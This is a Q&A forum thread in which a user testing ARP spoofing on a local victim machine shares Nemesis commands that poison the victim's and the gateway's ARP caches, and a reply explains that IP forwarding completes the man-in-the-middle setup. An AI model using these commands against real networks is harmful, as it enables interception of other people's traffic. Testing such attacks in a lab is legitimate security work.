4

I've been using Nemesis 1.4 to test ARP spoofing on a local victim machine. I've been spoofing both the victim machine and the default gateway to ARP redirect to my machine.

Spoofing victim's source MAC:

sudo nemesis arp -v -r -d eth0 -S [victim IP] -D [default gateway IP] \
                 -h [my system MAC]  -m [gateway MAC] -H [my MAC] -M [gateway MAC]

Spoofing gateways MAC:

sudo nemesis arp -v -r -d eth0 -S [gateway IP] -D [victim IP] \
                 -h [my system MAC]  -m [victim MAC] -H [my MAC] -M [victim MAC]

Afterwards a looping BASH is made and the ARP redirection begins, spoofing every 10 seconds. In tcpdump I can see the ARP replies going out, and it seems to be working. But once on the victims machine the internet connection suddenly becomes painfully slow, if it works at all. Is Nemesis not redirecting? If so what am I doing wrong?

Gilles 'SO- stop being evil'
  • 50,912
  • 13
  • 120
  • 179
Dividan84
  • 41
  • 1
  • 2

1 Answers1

3

From reading this article it appears that nemesis just poisons the arp cache of the victim and gateway to cause them to forward packets to your machine (the middle man).

You need to enable IP forwarding (see the previous article or this one for more detail on IP forwarding) on your machine to get the redirected packets forwarded to the correct systems.

HeatfanJohn
  • 320
  • 2
  • 12